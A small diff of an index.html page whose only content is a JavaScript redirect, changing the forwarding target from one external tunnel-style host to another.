--- a/index.html
+++ b/index.html
@@ -1,3 +1,3 @@
 <script type="text/javascript">
-   window.location.href="https://1ea17257.r33.cpolar.top";　
+   window.location.href="http://mecpy88j.beesnat.com";　
 </script>
